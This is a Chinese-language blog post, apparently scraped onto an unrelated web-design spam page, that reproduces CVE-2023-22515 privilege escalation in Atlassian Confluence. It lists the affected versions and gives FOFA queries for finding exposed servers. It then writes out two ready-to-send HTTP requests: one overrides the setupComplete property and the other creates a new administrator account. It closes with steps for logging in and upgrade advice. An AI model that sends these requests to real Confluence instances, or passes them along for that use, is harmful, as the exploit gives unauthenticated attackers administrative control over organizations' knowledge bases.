当前位置：首页 > news >正文

冠县网站设计光明新区做网站

news 2026/1/13 19:47:19

冠县网站设计,光明新区做网站,网站建设询价报告,网站更新问题文章目录 Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC] 0x01 前言免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用 0x02 漏洞描述 Confluence是一个专业的企业知识管理与协同软件也可以用于构建企业wiki。使用简单它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论信息推送。 Atlassian Confluence Data Center 和 Confluence Server 存在权限提升漏洞该漏洞由属性覆盖导致未经身份验证的远程攻击者可以重新执行 Confluence 安装流程并增加管理员账户从而访问 Confluence 实例。 0x03 影响版本 Confluence Data Center、Confluence Server 8.0.4 Confluence Data Center、Confluence Server 8.1.4 Confluence Data Center、Confluence Server 8.2.3 Confluence Data Center、Confluence Server 8.3.2 Confluence Data Center、Confluence Server 8.4.2 Confluence Data Center、Confluence Server 8.5.10x04 漏洞环境 FOFA语法app“ATLASSIAN-Confluence” 根据版本精确查询 bodyspan idfooter-build-information8.0.0/span0x05 漏洞复现 1.访问漏洞环境 2.构造POC POC1GET 覆盖 Confluence 服务器 bootstrapStatusProvider.applicationConfig.setupComplete 属性 GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupCompletefalse HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: / Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: closePOC2POST 开始新建管理员账户请求头添加X-Atlassian-Token: no-check POST /setup/setupadministrator.action HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: / Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded X-Atlassian-Token: no-check Content-Length: 107usernamecsfullNamecsemailyj%40yjtest.compasswordcstestconfirmcstestsetup-next-buttonNext3.复现 1.覆盖 Confluence 服务器 bootstrapStatusProvider.applicationConfig.setupComplete 属性出现以下截图属性覆盖成功。 2.开始新建管理员账户请求头添加X-Atlassian-Token: no-check 出现以下截图则添加成功。 3.直接用添加成功的账号密码登录重新访问登录主页点击statr 使用新建的用户名以及密码登录成功登录。 0x06 修复建议更新 Confluence Data Center、Confluence Server 至安全版本 https://www.atlassian.com/software/confluence/download-archives安全版本 Confluence Data Center、Confluence Server 8.3.3 Confluence Data Center、Confluence Server 8.4.3 Confluence Data Center、Confluence Server 8.5.2

查看全文

http://www.yutouwan.com/news/195395/